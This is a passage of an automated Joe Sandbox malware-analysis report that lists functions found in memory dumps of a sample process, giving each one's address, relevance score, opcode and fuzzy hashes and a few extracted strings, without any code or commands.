                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 97c377cee9ab3d2218d014e7cad0c12cb97e4e24944262f6a18b6d5de5a99ce2
                                • Instruction ID: cad8b9d3cb2335a74bedb24762684cfcc55497077f3ccc3bf976f8bcd6176f4e
                                • Opcode Fuzzy Hash: 97c377cee9ab3d2218d014e7cad0c12cb97e4e24944262f6a18b6d5de5a99ce2
                                • Instruction Fuzzy Hash: 6C31CD30A0E68D8FDB56DFA4C8216ED7FB0FF0A300F0500BAE018D31E2DA28A904C791
                                Function 00007FFD9B891918 Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d8822d01a3815d495fb559213be03e1887d2fbdd0b3d7d787afbcb295f0938ef
                                • Instruction ID: 032c5d873927242fe9a0eb29dc1a4d324b67ff93d28ba3184c86055781d86448
                                • Opcode Fuzzy Hash: d8822d01a3815d495fb559213be03e1887d2fbdd0b3d7d787afbcb295f0938ef
                                • Instruction Fuzzy Hash: 07218E32F1E94E5BEB74F7A898506E97BD0FF49310F01067BD458C71A1ED29AA0A4381
                                Function 00007FFD9B891569 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e29609350557b83bb091fcc61096ebbc12fe9a225958e45850b465a84d286dd4
                                • Instruction ID: a03e3639dd7c2a661c13f8aa1fc684928093e4ecb4ee1a4ce2e7d1c0502ce80c
                                • Opcode Fuzzy Hash: e29609350557b83bb091fcc61096ebbc12fe9a225958e45850b465a84d286dd4
                                • Instruction Fuzzy Hash: 0A11A211A4F6CA6AEF6267B948350617F905F07324B1F42FFD0E9CA0E3D80D9A46C302
                                Function 00007FFD9B8911F5 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c594419448d77d2e6fa2f0cbbe90e10d4211e664021ea72d9016564636c4e1ec
                                • Instruction ID: 201142a963bca05ea51de3385856b3845a7fed9c16303baf250cda533b73dd6c
                                • Opcode Fuzzy Hash: c594419448d77d2e6fa2f0cbbe90e10d4211e664021ea72d9016564636c4e1ec
                                • Instruction Fuzzy Hash: 9311233190D78C8FCB66EF6488651E53FA0FF1A300F4501EAD418CB192DB7AEA1AC741
                                Function 00007FFD9B89186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction ID: 562591556a54ec7001ce8ba259cf442e61daf040747a8a2d11776369b527ace2
                                • Opcode Fuzzy Hash: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction Fuzzy Hash: 93110D31E1A52D8EDB68EB60D4617FCB671FF06701F8114B9D04EA6192CE356A44DB40
                                Function 00007FFD9B890C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd37913807a62231d0a50f2c883dacd618264727f336762bb7f6a516994c0a61
                                • Instruction ID: 21390fe046c7a92f1efca58e6b3ea05bf3559bc26ab633416f1e372b2a52869a
                                • Opcode Fuzzy Hash: bd37913807a62231d0a50f2c883dacd618264727f336762bb7f6a516994c0a61
                                • Instruction Fuzzy Hash: F3112332F1590E8ECF68EB94D8247EDB761FF49300F80027AD019EB1A5CD3469418B80
                                Function 00007FFD9B890528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction ID: c73a1cfb75593f64e3e0008c71f261493adb5a5bc827a0156a1bef8181961530
                                • Opcode Fuzzy Hash: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction Fuzzy Hash: 84F05E3050960E8FDB55EF9494116E577A0FF59304F000176E41CD2195CA35A660C781
                                Function 00007FFD9B892536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59a9914c19081af18f6e17bd9b88d61c90fd6ed5e0ee4e53f7e7a4022e5e38bd
                                • Instruction ID: 1fbf5e0a813947b4a207871fff0c4a3addbd5fdfdb5687e75b8a4906d036d6f1
                                • Opcode Fuzzy Hash: 59a9914c19081af18f6e17bd9b88d61c90fd6ed5e0ee4e53f7e7a4022e5e38bd
                                • Instruction Fuzzy Hash: EDF0A271A1495E4FDFA8DF68C895BA9B7B1FB58340F1086E6900DE3255DA30AEC58F80
                                Function 00007FFD9B890640 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9cda230a2e41a553f0abc2a51ea3e5543d37ef455c4013804255ba58d143200
                                • Instruction ID: f87e49e2fe8e04818b9505d99d6a7fd6a00d1fc00b7c418bb8a27aad0af4c175
                                • Opcode Fuzzy Hash: f9cda230a2e41a553f0abc2a51ea3e5543d37ef455c4013804255ba58d143200
                                • Instruction Fuzzy Hash: 9BE0ED20F1F40E5AEE74B79D84A567465D1AB48314FBB8275E02EC62F1E928EE82C301
                                Function 00007FFD9B890530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: f30041032725aa9d0cdc4c1f37f2548c3d31e79fd394116e7dc55691a201d6d8
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: 57E04F3050960ECFDFA4FF58C4506A67BA1FF58344F100539E41CD2190CB35E6A0CB80
                                Function 00007FFD9B890C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d54fee8a73e13821c860aa1c036d4827bada412924710203874ce08e4fd0af4
                                • Instruction ID: ae7987038be6452c4d89019ed4ba17fe76c0a31e929db86d8fcf7711e1f1b52c
                                • Opcode Fuzzy Hash: 6d54fee8a73e13821c860aa1c036d4827bada412924710203874ce08e4fd0af4
                                • Instruction Fuzzy Hash: C3D0EC31B0551D4ECB54EA8CE8107EDB771EB85311F8001B6C10CE3155DA3059418B81

                                Executed Functions

                                Function 00007FFD9B885141 Relevance: 9.4, Strings: 7, Instructions: 624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: 07c5ada3a90ad1a20dc4ffc236ccd860747a57416fdd8d7692e084031a3b8bdb
                                • Instruction ID: 7f827049a7f83d0ebf9ac8ff72557329257881bd9df5319434d5bdde17f64eb1
                                • Opcode Fuzzy Hash: 07c5ada3a90ad1a20dc4ffc236ccd860747a57416fdd8d7692e084031a3b8bdb
                                • Instruction Fuzzy Hash: 1042F670E1966D8FDBA8DF68C8A0BE9B7B1FF58301F5040A9D05DA7295DB385A81CF40
                                Function 00007FFD9B8806E0 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: 82a8ce2c4a9265e92cb50faed2b5bb05d69031f2234476f7fde010ca58ac3db0
                                • Instruction ID: 7ec486cea8c9015ad1575594b67f266820ca59809d4260d221d20bb37d001a22
                                • Opcode Fuzzy Hash: 82a8ce2c4a9265e92cb50faed2b5bb05d69031f2234476f7fde010ca58ac3db0
                                • Instruction Fuzzy Hash: E8618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC2469468381
                                Function 00007FFD9B8804F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Function 00007FFD9B880F8D Relevance: .4, Instructions: 376COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction ID: 0d74a80b5b9681a6fc47cf589b6e4c9d15549aca86ca205bc7f5987a41fafd13
                                • Opcode Fuzzy Hash: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction Fuzzy Hash: 4DD14F71E19A5D8FDB5CEB58D8A4BACB7B1FF58300F0441B9E01DE32A6DA346981CB01
                                Function 00007FFD9B887C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3fd19e88356e0e9c8b7cad74055656fd0b8810599bf904c2e05154c0248342c1
                                • Instruction ID: 96227e0b963d1b6fcf8070ef4d3996892eac3dc21953ec4dcd5c03c47c38453d
                                • Opcode Fuzzy Hash: 3fd19e88356e0e9c8b7cad74055656fd0b8810599bf904c2e05154c0248342c1
                                • Instruction Fuzzy Hash: 31C17D74A0A95D8FEBA5DBA8C491BBCB7B2FF58300F514179C01DD7296CB386982CB40
                                Function 00007FFD9B883239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Function 00007FFD9B8805D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Function 00007FFD9B886163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dbc8a80d0388a0b6de27d8eed5816f0112baa5b8a34e13b448daa3bfecd96bdd
                                • Instruction ID: d5f26cff007f2ec272fe9a441fcbb0cc97d89ed95909fd3f3f3c59d1a6499824
                                • Opcode Fuzzy Hash: dbc8a80d0388a0b6de27d8eed5816f0112baa5b8a34e13b448daa3bfecd96bdd
                                • Instruction Fuzzy Hash: 8B719570E1491D8FDB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Function 00007FFD9B885931 Relevance: .2, Instructions: 196COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 07e4d3fe22d4b00dc502df4de51380f59140182dec0a5c4175b224f016db6301
                                • Instruction ID: 36b62f795e99c4b8708a36dc6bce8230f03c29438eeab179a82781cfbe3a6c42
                                • Opcode Fuzzy Hash: 07e4d3fe22d4b00dc502df4de51380f59140182dec0a5c4175b224f016db6301
                                • Instruction Fuzzy Hash: FE51E730A09A8D8FDB95EFA8C464AADBBF1FF59310F0404BAD01DD7296CE34A841C741
                                Function 00007FFD9B88129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Function 00007FFD9B882CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Function 00007FFD9B88238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77b825f064190c1283f69d94ed85ae6c07edb1185758589597d86374ce0d830c
                                • Instruction ID: fc9073415e1ff261f05c3fae37f77e90a88a3aac00d82eec7de5b87b3dd8d22e
                                • Opcode Fuzzy Hash: 77b825f064190c1283f69d94ed85ae6c07edb1185758589597d86374ce0d830c
                                • Instruction Fuzzy Hash: C051D761A0FA994FE7A29BA88C657A87BA0EF59300F0540F7D09CC71E7DE346A85C741
                                Function 00007FFD9B881828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Function 00007FFD9B881CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 47c4dc1641e7b0f277732e1916f324ad9690485bf476291288ba395ed7b8f821
                                • Instruction ID: a94297c7ede4146bbb3c38508d319870df39aba6fc746f1a902de0e411d3572d
                                • Opcode Fuzzy Hash: 47c4dc1641e7b0f277732e1916f324ad9690485bf476291288ba395ed7b8f821
                                • Instruction Fuzzy Hash: CD415D71E09A1D8FDB54EB98D8A4BECBBF1FF58301F4105AAD019E72A1DB349945CB40
                                Function 00007FFD9B885FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcae03c8a373398b026f5542c06a75dd7ffc10f4fcf87c6e7448e849471ea640
                                • Instruction ID: 9efbb1514707cf5811849beb343df30664fe3f790f48b575952afb311484a1fc
                                • Opcode Fuzzy Hash: bcae03c8a373398b026f5542c06a75dd7ffc10f4fcf87c6e7448e849471ea640
                                • Instruction Fuzzy Hash: DF416B70E14A4D8FDB84EFE8D865AEDBBB1FF48310F41017AE018E3296DA346941CB81
                                Function 00007FFD9B8864E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 123c64bad81a64d74a17771da9cf6e78408a35bcb7413a0a388e05aaa12d7d6d
                                • Instruction ID: 1371d48d680cf9640261e2ce45fc0d580b4d5194c5df2d4aca1660a9010de251
                                • Opcode Fuzzy Hash: 123c64bad81a64d74a17771da9cf6e78408a35bcb7413a0a388e05aaa12d7d6d
                                • Instruction Fuzzy Hash: 3B418070D0965D8FEB55DFA4C864AEDB7B1FF49300F1101BAD019D729ACB399981CB41
                                Function 00007FFD9B8883F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ef44857c8246e5b6685626cf853443c89d31c7134b8f77e29a660ed5d68a7f2
                                • Instruction ID: e5908bc6909c31b3700752a888dd8a9d4a558a660f445a630503fe6f4b16d91c
                                • Opcode Fuzzy Hash: 2ef44857c8246e5b6685626cf853443c89d31c7134b8f77e29a660ed5d68a7f2
                                • Instruction Fuzzy Hash: 36314A32E0961E8FDB58DFA4D4646FEB7B1EF58300F11017AE019E32D1CA395A41CB91
                                Function 00007FFD9B882BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction ID: 505111a99b68d92cd3c248e9f266e661c3c682d7a4c37cfa385b5f6dd85bedd8
                                • Opcode Fuzzy Hash: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction Fuzzy Hash: 1B312A70D0A64D8FDB55DFA8D8646EDB7B1FF59300F10047AE019E3291DB389940CB81
                                Function 00007FFD9B88186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction ID: 4e7380405c5fa0d7a0b30fd0c10e7661c7191ef7aeee2f6f53402d1a05b7253a
                                • Opcode Fuzzy Hash: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction Fuzzy Hash: A7110D31E5A92D8FD768EBA0D4617FCB271FF0A701F4114B9D05EA6192CE396A44CB40
                                Function 00007FFD9B880C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 093bfb2bd86040fa51a737862e311931d80e78f7be0c5aa7bf5d41c7431f10dd
                                • Instruction ID: 31c827a57105242e3f67f5ee1387a76c4b212901728800b833ebaad1f3822755
                                • Opcode Fuzzy Hash: 093bfb2bd86040fa51a737862e311931d80e78f7be0c5aa7bf5d41c7431f10dd
                                • Instruction Fuzzy Hash: 5711A331F1591E4FDB68EB94D8657EDB362FF45300F81027AD029AB1A5DE347A458B80
                                Function 00007FFD9B8808B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7dc29a35955b278efae6aee986d0e7884f4de60ed4d0c9ff055338a25d3e76d
